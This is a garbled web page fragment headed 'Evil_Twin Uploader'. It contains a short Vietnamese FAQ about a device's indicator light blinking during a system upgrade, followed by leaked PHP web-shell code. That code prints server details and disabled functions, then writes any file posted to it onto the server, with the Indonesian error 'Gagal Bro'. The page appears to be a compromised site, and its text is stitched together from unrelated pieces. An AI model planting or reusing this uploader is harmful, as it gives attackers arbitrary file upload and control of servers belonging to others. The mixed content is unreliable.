Evil_Twin Uploader

Tại sao đèn báo của thiết bị nhấp nháy liên tục sau khi cấu hình?

Thiết bị đang được nâng cấp hệ thống, vui lòng giữ nguồn điện ổn định cho thiết bị trong vòng năm phút.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial